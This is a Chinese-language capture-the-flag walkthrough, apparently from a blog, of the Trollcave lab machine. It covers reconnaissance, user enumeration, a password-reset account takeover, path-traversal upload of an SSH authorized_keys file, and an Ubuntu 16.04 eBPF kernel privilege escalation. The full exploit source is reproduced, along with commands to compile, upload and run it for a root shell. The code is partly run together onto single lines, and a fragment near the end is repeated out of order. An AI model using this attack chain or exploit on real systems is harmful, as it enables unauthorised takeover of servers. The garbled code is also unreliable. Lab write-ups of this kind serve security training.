当前位置: 首页 > news >正文

trollcave靶场

配置

第一步:启动靶机时按下 shift 键,

  • 进入以下界面

image-20230811104648298

第二步:选择第二个选项,然后按下 e 键,进入编辑界面

image-20230811104707659

将这里的ro修改为rw single init=/bin/bash,然后按ctrl+x,进入一个相当于控制台的界面,里面可以执行命令

image-20230811104721458

ip a 查看一下实际用的网卡,这里是ens33

image-20230811104737405

vim /etc/network/interfaces 看一下配置信息用的是哪一个网卡,如果不一致,则将这两个都改成 ens33

  • 按下 i 即可进入编辑模式

image-20230811104752952

/etc/init.d/networking restart 重启网卡服务

渗透流程

一、信息收集

发现ip

 netdiscover -i eth0 -r 192.168.16.0/24

or

nmap -sP 192.168.16.0/24

image-20230814093013319

获取到IP后收集详细信息:

nmap -sV -sC -A  192.168.16.128

开放端口80和22,版本ubuntu

image-20230814093808584

扫描目录

└─# gobuster  dir -u http://192.168.16.128    -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

image-20230814095946342

收集网站用户名与角色信息

发现登录页面,点击下面发现用户进行了更换,更换是在上面得目录进行操作

image-20230814100228716

尝试获取全部用户名自己编写脚本

获取整个网页

#coding:utf-8 
import requests
import re
# 假设id是一个变量,用来构造请求的URL
def get_userinfo(id):  # 发送HTTP GET请求并获取响应的文本内容  response = requests.get("http://192.168.16.128/users/%s"  %id).textreturn responseprint(get_userinfo('1'))

配置该内容:

<h1>King's page</h1>
<b>
Superadmin
</b>

添加正则表达式匹配对应的内容:

这里会用到 re 模块提供的一个函数为re.search。用于在字符串中搜索与正则表达式匹配的内容。它会在整个字符串中查找第一个匹配项,并返回一个匹配对象。

 #匹配内容 <h1>King's page</h1>username=re.search('<h1>(.*?)\'s',response).group(1)
#匹配内容 <b>Superadmin</b>
level=re.search('\s<b>\s(.*?)\s</b>',response).group(1)#\s是换行符

完整获取:

#coding:utf-8 
import requests
import re
# 假设id是一个变量,用来构造请求的URL
def get_userinfo(id):  # 发送HTTP GET请求并获取响应的文本内容  response = requests.get('http://192.168.16.128/users/%s' %id).text#匹配内容 <h1>King's page</h1>username=re.search('<h1>(.*?)\'s',response).group(1)level=re.search('\s<b>\s(.*?)\s</b>',response).group(1)return username,levelfor i in range(0,20):try:username,level=(get_userinfo(i))print(username+":"+level)except:None

image-20230814120054744

King:Superadmin
dave:Admin
dragon:Admin
coderguy:Admin
cooldude89:Moderator
Sir:Moderator
Q:Moderator
teflon:Moderator
TheDankMan:Regular member
artemus:Regular member
MrPotatoHead:Regular member
Ian:Regular member
kev:Member
notanother:Member
anybodyhome:Member
onlyme:Member
xer:Member

收集登录失败的提示:

每个账号失败提示的都不一样

image-20230814141252910

抓包获取登录面详细信息

image-20230814142315148

看到有个·utf-8编码删除看看会不会出错

image-20230814142548223

收集博客信息

1.发现该网站有部署密码重置功能

image-20230814151025370

image-20230814152013355

搜索发现rails是一个开发框架

image-20230814152107587

直接去github上寻找源码

https://github.com/rails/rails

image-20230814152220319

二、获取密码

尝试使用此路径登录password_resets

image-20230814153412125

百度搜索发现

image-20230814153627405

添加目录:

192.168.16.128/password_resets/new

x’e访问:

image-20230814153659756

成功出现修改密码页面

发现只能重置普通用户密码

image-20230814153732631

改为重置xer用户密码

进入他给的重置用户连接:

http://192.168.16.128/password_resets/edit.8QidiHVYZPZI8hN3uk4nzg?name=xer

image-20230814153947237

更改自动登录成功

image-20230814154025136

发现文件上传功能

上传报错404,可能是权限不够

image-20230814154300755

三、更换管理员用户,传马

利用重置密码链接,尝试修改用户名是否可以直接重置对应的密码。

 http://192.168.16.128/password_resets/edit.SbA7EAliLdkfS-R03alnUg?name=King

成功进来

image-20230814155209131

上传文件显示

File upload is currently disabled文件上载当前已禁用

在控制面板中开启

image-20230814155339924

再次上传

image-20230814155433118

打开连接得到路径

image-20230814155622608

image-20230814155639714

访问后门地址:

http://192.168.16.128//uploads/King/x.php

发现没有成功编译

image-20230814155756752

因为支持php编译

四、漏洞利用

1.任意位置文件上传利用

image-20230814161414877

会发现位置来到了上级目录

image-20230814161504908

尝试将文件上传到coderguy用户家目录下:错误可能用户不存在或没有权限

想到目标网站是rails部署的,运行web服务的用户会不会是rails呢?

尝试目录更换

../../../../../../home/rails/xx.gif

image-20230814161858077

2.ssh公钥免密利用

利用工具 ssh-keygen -f Identity

ssh-keygen的使用方法:

https://blog.csdn.net/qq_38570571/article/details/79268426

创建公钥

ssh-keygen -f Identity

image-20230814162257069

公钥创建成功

image-20230814162353400

将Identity.pub重命名为authorized_keys

authorized_keys 是linux 操作系统下,专门用来存放公钥的地方,只要公钥放到了服务器的正确位置,并且拥有正确的权限,你才可以通过你的私钥,免密登录linux服务器

image-20230814162758533

完成后上传到上传到/home/rails/.ssh/

../../../../../../home/rails/authorized_keys

image-20230814163015625

3.shell连接

ssh -i Identity rails@192.168.16.128

image-20230814163222907

权限为普通用户

五、提权

1.查看etc/passwd

image-20230814163555950

2.查看本地开启的服务

netstat -pant

image-20230814163951913

3.尝试去目录获取数据库账号密码

cd /var/www/trollcave/configcat database.yml

image-20230814164417527

得到密码和账号

adapter: postgresql
database: trollcave
username: tc
password: sowvillagedinnermoment

这里连接失败,原因不知道

4.查看sqllit3数据库

sqlite3 /var/www/trollcave/db/development.sqlite3
select * from users;

image-20230814171554008

内核提权

已知服务器内核版本:Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-116-generic x86_64)

存在提权漏洞

poc地址:https://www.exploit-db.com/exploits/44298

/** Ubuntu 16.04.4 kernel priv esc** all credits to @bleidl* - vnik*/// Tested on:
// 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64
// if different kernel adjust CRED offset + check kernel stack size
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <fcntl.h>
#include <string.h>
#include <linux/bpf.h>
#include <linux/unistd.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/stat.h>
#include <stdint.h>#define PHYS_OFFSET 0xffff880000000000
#define CRED_OFFSET 0x5f8
#define UID_OFFSET 4
#define LOG_BUF_SIZE 65536
#define PROGSIZE 328int sockets[2];
int mapfd, progfd;char *__prog = 	"\xb4\x09\x00\x00\xff\xff\xff\xff""\x55\x09\x02\x00\xff\xff\xff\xff""\xb7\x00\x00\x00\x00\x00\x00\x00""\x95\x00\x00\x00\x00\x00\x00\x00""\x18\x19\x00\x00\x03\x00\x00\x00""\x00\x00\x00\x00\x00\x00\x00\x00""\xbf\x91\x00\x00\x00\x00\x00\x00""\xbf\xa2\x00\x00\x00\x00\x00\x00""\x07\x02\x00\x00\xfc\xff\xff\xff""\x62\x0a\xfc\xff\x00\x00\x00\x00""\x85\x00\x00\x00\x01\x00\x00\x00""\x55\x00\x01\x00\x00\x00\x00\x00""\x95\x00\x00\x00\x00\x00\x00\x00""\x79\x06\x00\x00\x00\x00\x00\x00""\xbf\x91\x00\x00\x00\x00\x00\x00""\xbf\xa2\x00\x00\x00\x00\x00\x00""\x07\x02\x00\x00\xfc\xff\xff\xff""\x62\x0a\xfc\xff\x01\x00\x00\x00""\x85\x00\x00\x00\x01\x00\x00\x00""\x55\x00\x01\x00\x00\x00\x00\x00""\x95\x00\x00\x00\x00\x00\x00\x00""\x79\x07\x00\x00\x00\x00\x00\x00""\xbf\x91\x00\x00\x00\x00\x00\x00""\xbf\xa2\x00\x00\x00\x00\x00\x00""\x07\x02\x00\x00\xfc\xff\xff\xff""\x62\x0a\xfc\xff\x02\x00\x00\x00""\x85\x00\x00\x00\x01\x00\x00\x00""\x55\x00\x01\x00\x00\x00\x00\x00""\x95\x00\x00\x00\x00\x00\x00\x00""\x79\x08\x00\x00\x00\x00\x00\x00""\xbf\x02\x00\x00\x00\x00\x00\x00""\xb7\x00\x00\x00\x00\x00\x00\x00""\x55\x06\x03\x00\x00\x00\x00\x00""\x79\x73\x00\x00\x00\x00\x00\x00""\x7b\x32\x00\x00\x00\x00\x00\x00""\x95\x00\x00\x00\x00\x00\x00\x00""\x55\x06\x02\x00\x01\x00\x00\x00""\x7b\xa2\x00\x00\x00\x00\x00\x00""\x95\x00\x00\x00\x00\x00\x00\x00""\x7b\x87\x00\x00\x00\x00\x00\x00""\x95\x00\x00\x00\x00\x00\x00\x00";char bpf_log_buf[LOG_BUF_SIZE];static int bpf_prog_load(enum bpf_prog_type prog_type,const struct bpf_insn *insns, int prog_len,const char *license, int kern_version) {union bpf_attr attr = {.prog_type = prog_type,.insns = (__u64)insns,.insn_cnt = prog_len / sizeof(struct bpf_insn),.license = (__u64)license,.log_buf = (__u64)bpf_log_buf,.log_size = LOG_BUF_SIZE,.log_level = 1,};attr.kern_version = kern_version;bpf_log_buf[0] = 0;return syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr));
}static int bpf_create_map(enum bpf_map_type map_type, int key_size, int value_size,int max_entries) {union bpf_attr attr = {.map_type = map_type,.key_size = key_size,.value_size = value_size,.max_entries = max_entries};return syscall(__NR_bpf, BPF_MAP_CREATE, &attr, sizeof(attr));
}static int bpf_update_elem(uint64_t key, uint64_t value) {union bpf_attr attr = {.map_fd = mapfd,.key = (__u64)&key,.value = (__u64)&value,.flags = 0,};return syscall(__NR_bpf, BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr));
}static int bpf_lookup_elem(void *key, void *value) {union bpf_attr attr = {.map_fd = mapfd,.key = (__u64)key,.value = (__u64)value,};return syscall(__NR_bpf, BPF_MAP_LOOKUP_ELEM, &attr, sizeof(attr));
}static void __exit(char *err) {fprintf(stderr, "error: %s\n", err);exit(-1);
}static void prep(void) {mapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(int), sizeof(long long), 3);if (mapfd < 0)__exit(strerror(errno));progfd = bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER,(struct bpf_insn *)__prog, PROGSIZE, "GPL", 0);if (progfd < 0)__exit(strerror(errno));if(socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets))__exit(strerror(errno));if(setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd)) < 0)__exit(strerror(errno));
}static void writemsg(void) {char buffer[64];ssize_t n = write(sockets[0], buffer, sizeof(buffer));if (n < 0) {perror("write");return;}if (n != sizeof(buffer))fprintf(stderr, "short write: %lu\n", n);
}#define __update_elem(a, b, c) \bpf_update_elem(0, (a)); \bpf_update_elem(1, (b)); \bpf_update_elem(2, (c)); \writemsg();static uint64_t get_value(int key) {uint64_t value;if (bpf_lookup_elem(&key, &value))__exit(strerror(errno));return value;
}static uint64_t __get_fp(void) {__update_elem(1, 0, 0);return get_value(2);
}static uint64_t __read(uint64_t addr) {__update_elem(0, addr, 0);return get_value(2);
}static void __write(uint64_t addr, uint64_t val) {__update_elem(2, addr, val);
}static uint64_t get_sp(uint64_t addr) {return addr & ~(0x4000 - 1);
}static void pwn(void) {uint64_t fp, sp, task_struct, credptr, uidptr;fp = __get_fp();if (fp < PHYS_OFFSET)__exit("bogus fp");sp = get_sp(fp);if (sp < PHYS_OFFSET)__exit("bogus sp");task_struct = __read(sp);if (task_struct < PHYS_OFFSET)__exit("bogus task ptr");printf("task_struct = %lx\n", task_struct);credptr = __read(task_struct + CRED_OFFSET); // credif (credptr < PHYS_OFFSET)__exit("bogus cred ptr");uidptr = credptr + UID_OFFSET; // uidif (uidptr < PHYS_OFFSET)__exit("bogus uid ptr");printf("uidptr = %lx\n", uidptr);__write(uidptr, 0); // set both uid and gid to 0if (getuid() == 0) {printf("spawning root shell\n");system("/bin/bash");exit(0);}__exit("not vulnerable?");
}int main(int argc, char **argv) {prep();pwn();return 0;
}     

编译exp

# 由于目标主机上没有gcc环境,在kali中编译
gcc -c pwn.c -o pwn    

利用ssh上传exp到目标主机

scp -i Identity pwn rails@192.168.16.128:/home/rails/

目标主机上提权

添加可执行权限

chmod +x pwn

运行提权成功

D_OFFSET); // cred

if (credptr < PHYS_OFFSET)__exit("bogus cred ptr");uidptr = credptr + UID_OFFSET; // uid
if (uidptr < PHYS_OFFSET)__exit("bogus uid ptr");printf("uidptr = %lx\n", uidptr);
__write(uidptr, 0); // set both uid and gid to 0if (getuid() == 0) {printf("spawning root shell\n");system("/bin/bash");exit(0);
}__exit("not vulnerable?");

}

int main(int argc, char **argv) {
prep();
pwn();

return 0;

}


### 编译exp```sh
# 由于目标主机上没有gcc环境,在kali中编译
gcc -c pwn.c -o pwn    

利用ssh上传exp到目标主机

scp -i Identity pwn rails@192.168.16.128:/home/rails/

目标主机上提权

添加可执行权限

chmod +x pwn

运行提权成功

相关文章:

trollcave靶场

配置 第一步&#xff1a;启动靶机时按下 shift 键&#xff0c; 进入以下界面 第二步&#xff1a;选择第二个选项&#xff0c;然后按下 e 键&#xff0c;进入编辑界面 将这里的ro修改为rw single init/bin/bash&#xff0c;然后按ctrlx&#xff0c;进入一个相当于控制台的界面…...

反馈式编译

一、 反馈式编译 简介 PGO&#xff0c;即Profile-Guided Optimizations&#xff0c;反馈式优化。PGO是编译器的又一优化技术&#xff0c;PGO与其它的一些优化技术/选项有一个明显的区别是&#xff1a;PGO优化是分三步完成的&#xff0c;是一个动态的优化过程。 反馈优化过…...

sql-libs靶场-----0x00、环境准备

文章目录 一、PhPstudy下载、安装二、Sqli-libs下载、搭建三、启用Sqli-libs phpstudy地址&#xff1a;https://www.xp.cn/ sqli-libs地址&#xff1a;https://github.com/Audi-1/sqli-labs 一、PhPstudy下载、安装 1、下载–解压–安装&#xff0c;安装完成如下图 2、更换php…...

一百四十九、Kettle——Linux上安装的kettle8.2创建共享资源库时遇到的问题(持续更新中)

一、目的 在kettle8.2在Linux上安装好可以启动界面、并且可以连接MySQL、Hive、ClickHouse等数据库后开始创建共享资源库&#xff0c;但是遇到了一些问题 二、Linux系统以及kettle版本 &#xff08;一&#xff09;Linux&#xff1a;CentOS 7 英文的图形化界面模式 &#…...

Mysql 建索引规范

索引规范 今天在建线上表的时候&#xff0c;做了一个varchar的索引&#xff0c;运维说varchar的索引会占用很大的内存。 于是 上网搜了一下建索引规范 一、建表规约 【强制】&#xff08;1&#xff09; 存储引擎必须使用InnoDB 解读&#xff1a;InnoDB支持事物、行级锁、并发…...

新基建助推数字经济,CosmosAI率先布局AI超算租赁新纪元

伦敦, 8月14日 - 在英国伦敦隆重的Raffles OWO举办的欧盟数字超算新时代战略合作签约仪式&#xff0c;CosmosAI、Infinite Money Fund与Internet Research Lab三方强强联手&#xff0c;达成了历史性的合作协议&#xff0c;共同迈向超算租赁新纪元。 ​ 这次跨界的合作昭示了全球…...

微服务06-分布式事务解决方案Seata

1、Seata 概述 Seata事务管理中有三个重要的角色: TC (Transaction Coordinator) - **事务协调者:**维护全局和分支事务的状态,协调全局事务提交或回滚。 TM (Transaction Manager) - **事务管理器:**定义全局事务的范围、开始全局事务、提交或回滚全局事务。 RM (Resourc…...

Wireshark有线网卡抓包报错The capture session could not be initiated on capture device

最近在使用Wireshark进行抓包排错时&#xff0c;选择网卡后提示报错&#xff0c;在此之前从未出现过&#xff0c;报错内容如下&#xff1a; 提示内容是The capture session could not be initiated on capture device&#xff0c;无法在捕获设备上启动捕获会话要求操作是Please…...

FreeSWITCH执行bridge时如何“制造“ringback

dialplan如果这样写&#xff1a; <action application"record_session" data"$${recordings_dir}/${caller_id_number}.${strftime(%Y-%m-%d-%H-%M-%S)}.wav"/> <action application"bridge" data"user/1001"/> 或者这样…...

Java # 类加载子系统

一、概述 1、 类加载器子系统负责从文件系统或者网络中加载.Class文件 2、classloader只负责类的加载&#xff0c;至于他是否能够运行由执行引擎来决定 3、加载的类的信息会存放在方法区&#xff08;元空间&#xff09;中 二、加载过程 ​​​​​​​ 1、加载阶段 1、通…...

YOLOv5改进系列(21)——替换主干网络之RepViT(清华 ICCV 2023|最新开源移动端ViT)

【YOLOv5改进系列】前期回顾: YOLOv5改进系列(0)——重要性能指标与训练结果评价及分析 YOLOv5改进系列(1)——添加SE注意力机制 YOLOv5改进系列(2...

安卓中常见的字节码指令介绍

问题背景 安卓开发过程中&#xff0c;经常要通过看一些java代码对应的字节码&#xff0c;来了解java代码编译后的运行机制&#xff0c;本文将通过一个简单的demo介绍一些基本的字节码指令。 问题分析 比如以下代码&#xff1a; public class test {public static void main…...

TCP的三次握手和四次挥手

文章目录 三次握手四次挥手TIME_WAITCLOSE_WAIT 使用wireshark观察 三次握手 握手的最终目的是主机之间建立连接 首先要有两个预备知识点 三次握手建立连接不一定会成功&#xff0c;其中最担心的就是最后一次握手失败&#xff0c;不过会有配套的解决方案建立好连接后是需要被…...

前后端分离------后端创建笔记(08)表单提交

本文章转载于【SpringBootVue】全网最简单但实用的前后端分离项目实战笔记 - 前端_大菜007的博客-CSDN博客 仅用于学习和讨论&#xff0c;如有侵权请联系 源码&#xff1a;https://gitee.com/green_vegetables/x-admin-project.git 素材&#xff1a;https://pan.baidu.com/s/…...

途乐证券-KDJ分别代表什么?

KDJ是一种技能剖析东西&#xff0c;常见于股票、期货等商场中&#xff0c;它的全称是随机目标&#xff08;KDJ&#xff09;。KDJ目标包括三条线&#xff0c;分别为K线、D线和J线。那么&#xff0c;KDJ分别代表什么呢&#xff1f;本文将从多个视点进行剖析。 1. KDJ的简单介绍 …...

用C语言重写的原始Matlab OpenShoe算法:深入理解和实现步态分析的关键技术

一、引言 在许多领域&#xff0c;如医疗健康、体育科学、虚拟现实和机器人技术中&#xff0c;步态分析都是一个重要的研究领域。步态分析可以帮助我们理解人体运动的机制&#xff0c;评估疾病的影响&#xff0c;优化运动员的表现&#xff0c;甚至设计更自然的机器人运动。Open…...

什么开放式耳机音质好?值得推荐的开放式耳机分享

与封闭式耳机相比&#xff0c;开放式耳机具有更为自然、真实的音质&#xff0c;能够更好地还原音乐现场的声音环境。以下是几款值得推荐的开放式耳机&#xff0c;都来看看有哪些吧。 推荐一&#xff1a;NANK南卡00压开放式耳机 点评&#xff1a;体验最好的开放式耳机没有之一…...

mac harbor的安装

harbor的安装 为什么要整这个呢&#xff0c;因为我在学习k8s&#xff0c;但是需要一个自己的镜像仓库。于是&#xff0c;最开始想到的就是在本地直接部署一个&#xff0c;还比较安全、快速。 直接下载了官方的项目&#xff0c;运行脚本发现出了异常&#xff0c;这种异常我已经…...

SetActive和Enable有什么不同?

介绍 在Unity中&#xff0c;SetActive和Enable都是常用的方法&#xff0c;用于在运行时控制对象的可见性和功能开启状态。尽管它们的目的相似&#xff0c;但在使用时有一些区别。 SetActive SetActive是GameObject类的方法&#xff0c;用于启用或禁用游戏对象及其所有子对象…...

【Vue-Router】重定向

First.vue <template><h1>First Seciton</h1> </template>Second.vue&#xff0c;Third.vue代码同理 UserSettings.vue <template><h1>UserSettings</h1><router-link to"/settings/children1">children1</ro…...

Flask RESTful 示例

目录 1. 环境准备2. 安装依赖3. 修改main.py4. 运行应用5. API使用示例获取所有任务获取单个任务创建新任务更新任务删除任务 中文乱码问题&#xff1a; 下面创建一个简单的Flask RESTful API示例。首先&#xff0c;我们需要创建环境&#xff0c;安装必要的依赖&#xff0c;然后…...

基于ASP.NET+ SQL Server实现(Web)医院信息管理系统

医院信息管理系统 1. 课程设计内容 在 visual studio 2017 平台上&#xff0c;开发一个“医院信息管理系统”Web 程序。 2. 课程设计目的 综合运用 c#.net 知识&#xff0c;在 vs 2017 平台上&#xff0c;进行 ASP.NET 应用程序和简易网站的开发&#xff1b;初步熟悉开发一…...

【第二十一章 SDIO接口(SDIO)】

第二十一章 SDIO接口 目录 第二十一章 SDIO接口(SDIO) 1 SDIO 主要功能 2 SDIO 总线拓扑 3 SDIO 功能描述 3.1 SDIO 适配器 3.2 SDIOAHB 接口 4 卡功能描述 4.1 卡识别模式 4.2 卡复位 4.3 操作电压范围确认 4.4 卡识别过程 4.5 写数据块 4.6 读数据块 4.7 数据流…...

2025季度云服务器排行榜

在全球云服务器市场&#xff0c;各厂商的排名和地位并非一成不变&#xff0c;而是由其独特的优势、战略布局和市场适应性共同决定的。以下是根据2025年市场趋势&#xff0c;对主要云服务器厂商在排行榜中占据重要位置的原因和优势进行深度分析&#xff1a; 一、全球“三巨头”…...

【C++进阶篇】智能指针

C内存管理终极指南&#xff1a;智能指针从入门到源码剖析 一. 智能指针1.1 auto_ptr1.2 unique_ptr1.3 shared_ptr1.4 make_shared 二. 原理三. shared_ptr循环引用问题三. 线程安全问题四. 内存泄漏4.1 什么是内存泄漏4.2 危害4.3 避免内存泄漏 五. 最后 一. 智能指针 智能指…...

Ubuntu Cursor升级成v1.0

0. 当前版本低 使用当前 Cursor v0.50时 GitHub Copilot Chat 打不开&#xff0c;快捷键也不好用&#xff0c;当看到 Cursor 升级后&#xff0c;还是蛮高兴的 1. 下载 Cursor 下载地址&#xff1a;https://www.cursor.com/cn/downloads 点击下载 Linux (x64) &#xff0c;…...

Chrome 浏览器前端与客户端双向通信实战

Chrome 前端&#xff08;即页面 JS / Web UI&#xff09;与客户端&#xff08;C 后端&#xff09;的交互机制&#xff0c;是 Chromium 架构中非常核心的一环。下面我将按常见场景&#xff0c;从通道、流程、技术栈几个角度做一套完整的分析&#xff0c;特别适合你这种在分析和改…...

从零开始了解数据采集(二十八)——制造业数字孪生

近年来&#xff0c;我国的工业领域正经历一场前所未有的数字化变革&#xff0c;从“双碳目标”到工业互联网平台的推广&#xff0c;国家政策和市场需求共同推动了制造业的升级。在这场变革中&#xff0c;数字孪生技术成为备受关注的关键工具&#xff0c;它不仅让企业“看见”设…...

用 Rust 重写 Linux 内核模块实战:迈向安全内核的新篇章

用 Rust 重写 Linux 内核模块实战&#xff1a;迈向安全内核的新篇章 ​​摘要&#xff1a;​​ 操作系统内核的安全性、稳定性至关重要。传统 Linux 内核模块开发长期依赖于 C 语言&#xff0c;受限于 C 语言本身的内存安全和并发安全问题&#xff0c;开发复杂模块极易引入难以…...

【Linux】使用1Panel 面板让服务器定时自动执行任务

服务器就是一台24小时开机的主机&#xff0c;相比自己家中不定时开关机的主机更适合完成定时任务&#xff0c;例如下载资源、备份上传&#xff0c;或者登录某个网站执行一些操作&#xff0c;只需要编写 脚本&#xff0c;然后让服务器定时来执行这个脚本就可以。 有很多方法实现…...